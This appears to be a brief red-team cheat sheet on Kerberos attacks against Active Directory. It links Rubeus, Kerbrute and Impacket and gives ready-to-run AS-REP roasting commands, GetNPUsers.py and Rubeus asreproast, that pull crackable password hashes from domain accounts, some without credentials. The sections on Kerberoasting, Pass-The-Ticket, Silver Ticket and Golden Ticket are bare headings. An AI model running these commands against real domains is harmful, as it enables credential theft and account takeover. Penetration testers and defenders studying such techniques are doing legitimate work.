Kerberoast

Tools

Rubeus: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe

Kerbrute: https://github.com/ropnop/kerbrute

Impacket: https://github.com/SecureAuthCorp/impacket

ASREP-Roast

Impacket

# ASREP check on all domain Users (Requires valid domain credentials)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

# ASREP check on a list of domain user (Does not require domain credentials)
python2 GetNPUsers.py <Domain> -usersfile <UserList>  -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

Rubeus

# Extract from all domain accounts
.\Rubeus.exe asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt

Cracking

Brute Force

Kerbrute

Download: https://github.com/ropnop/kerbrute

Rubeus

Kerberoasting

Impacket

Rubeus

Pass-The-Ticket

Mimikatz

Rubeus

PsExec

Silver Ticket

Golden Ticket

Last updated